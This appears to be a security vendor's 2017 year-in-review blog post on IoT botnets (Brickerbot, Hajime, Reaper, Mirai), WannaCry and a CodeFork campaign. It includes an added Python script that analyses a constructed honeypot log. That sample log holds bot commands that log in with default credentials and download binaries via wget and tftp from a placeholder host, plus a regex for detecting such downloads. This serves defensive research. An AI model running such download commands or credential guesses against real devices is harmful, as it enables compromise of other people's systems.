As 2017 comes to a close, we decided to take a look back at a number of new attack types and threats that we saw throughout the year. Our team took a deep dive into researching and testing many of these threats to find out how they operate and how big a threat they really were, by setting up honeypots, intentionally bricking a colleague’s device, and building IoT chatbots. Below are some of the highlights from our year:
Once dangerous tools are released to the public, they can be downloaded—and modified and enhanced—by anyone. Radware performed a quick test to see how easy or difficult it would be for an average hacker to take the now open-sourced Mirai source code and extend its capabilities with a new, advanced attack vector.
On April 5th, Radware’s Pascal Geenens released the results of his research covering a four-day period during which our honeypot recorded 1,895 Permanent Denial of Service (PDoS) attack attempts performed from several locations around the world. He coined the term “Brickerbot” for this new threat. About a week after the initial discovery of Brickerbot, Pascal offered his thoughts on who was being targeted and why. He also recorded the results of a “brick test” done on a camera belonging to one of our security evangelists.
A new version of the BrickerBot PDoS attack was discovered (BrickerBot.3) with a new command sequence on a different honeypot location. Around this time, the author of Brickerbot also came forward to identify himself and make some statements about the purpose and creation of Brickerbot.
Radware decided to conduct further research into how Brickerbot works. Using one of the more recently discovered BrickerBot source IP addresses at the time, we performed a TCP connection test on port TCP/23.
Lost amid all the headlines about Brickerbot was another IoT threat, known as Hajime. Unlike Brickerbot, the intentions and author of this botnet were unknown and it was the subject of much research by those who wanted to know what kind of threat they were dealing with. In a timespan of a little over five weeks, we counted almost 15,000 infection attempts from more than 12,000 unique IPs.
In late October, months after Brickerbot had begun to fade from the spotlight, a new IoT threat formed, known as Reaper. Many thought this botnet could rival Mirai and were calling it potentially one of the most dangerous threats seen. Pascal took a look at how this threat compared to Mirai and the kinds of vulnerabilities that were being exploited.
On Friday, May 12th a global incident related to a ransomware variant named WannaCry broke out, targeting computers around the world. The campaign spread across networks by leveraging a recently disclosed vulnerability in the Microsoft SMB service. A month later the Shadow Brokers, a hacking group that targets the NSA, leaked hacking tools from the Equation Group.
After the Dyn attack by Mirai in October 2016, we knew we were facing a threat that would reshape the DDoS threat landscape. In early January we started to deploy sensors to get a feel for how bad it actually was. While tracking initial connections, we found that there were less than 10 minutes between any two connections from bots trying to compromise our node. Given this regular activity, we set out to create a chatbot that would hold a meaningful dialog with the bots, with the goal of getting them to reveal their malware binary.
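The two measurements described above, the gap between successive bot connections to a sensor and the download command a bot issues once its login dialog succeeds, are easy to pull out of a honeypot log. The following is an added example, not Radware's sensor or chatbot code: it assumes a simple one-line-per-event log format (timestamp, source IP, event type, detail) and runs over a constructed sample in which every IP, credential and URL is a placeholder.

```python
"""
Added example (not Radware's code): analyse a constructed telnet-honeypot log
for the two things the post measures -- how often bots knock on a sensor
(inter-arrival time between connections) and what a bot does once its dialog
succeeds (the download command that reveals where its binary is hosted).
The log format is an assumption; all lines, IPs, credentials and URLs are
constructed placeholders (RFC 5737 documentation ranges).
"""
import re
from collections import Counter
from datetime import datetime

# Constructed sample: "<ISO timestamp> <src_ip> <event> <detail>"
SAMPLE_LOG = """\
2017-01-09T10:00:00 203.0.113.5 CONNECT -
2017-01-09T10:00:01 203.0.113.5 LOGIN root:root
2017-01-09T10:00:02 203.0.113.5 CMD enable
2017-01-09T10:00:03 203.0.113.5 CMD /bin/busybox wget http://198.51.100.7/bins/sample.arm -O /tmp/.x
2017-01-09T10:06:00 198.51.100.9 CONNECT -
2017-01-09T10:06:01 198.51.100.9 LOGIN admin:admin
2017-01-09T10:06:02 198.51.100.9 CMD cd /tmp; tftp -g -r sample.mips 198.51.100.7
2017-01-09T10:14:30 203.0.113.5 CONNECT -
2017-01-09T10:14:31 203.0.113.5 LOGIN root:12345
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (CONNECT|LOGIN|CMD) (.*)$")
# A bot typically fetches its payload with wget/curl/tftp right after logging in;
# capture the host (optionally with scheme and path) that follows the tool name.
DOWNLOAD_RE = re.compile(
    r"\b(?:wget|curl|tftp)\b.*?((?:https?://)?\d{1,3}(?:\.\d{1,3}){3}\S*)"
)


def parse_log(text):
    """Yield (timestamp, ip, event, detail); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def analyse(text):
    """Summarise connection cadence, credentials tried and payload sources."""
    events = list(parse_log(text))
    connects = [ts for ts, _, ev, _ in events if ev == "CONNECT"]
    # Seconds between consecutive connection attempts, in log order
    gaps = [(b - a).total_seconds() for a, b in zip(connects, connects[1:])]
    creds = Counter(d for _, _, ev, d in events if ev == "LOGIN")
    payloads = set()
    for _, _, ev, d in events:
        if ev == "CMD":
            m = DOWNLOAD_RE.search(d)
            if m:
                payloads.add(m.group(1))
    return {
        "attempts": len(connects),
        "unique_ips": len({ip for _, ip, ev, _ in events if ev == "CONNECT"}),
        "max_gap_minutes": max(gaps) / 60 if gaps else None,
        "top_credentials": creds.most_common(3),
        "payload_sources": sorted(payloads),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The `payload_sources` list is the piece a defender acts on: each entry is a host a bot pointed an infected device at, which can be handed to a blocklist or fetched in a sandbox for further analysis, while `max_gap_minutes` gives the "less than 10 minutes between connections" figure for whatever window the log covers.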
Last but not least is a campaign by hacktivist group CodeFork. As a result of Radware’s acquisition of Seculert, Radware has expanded its research capabilities to include malware intelligence. For two years, the team had been following CodeFork, who launched a new campaign with updated malware tools and infection techniques. Using file-less techniques for persistence, the tool was capable of sneaking under the radar of traditional defense systems.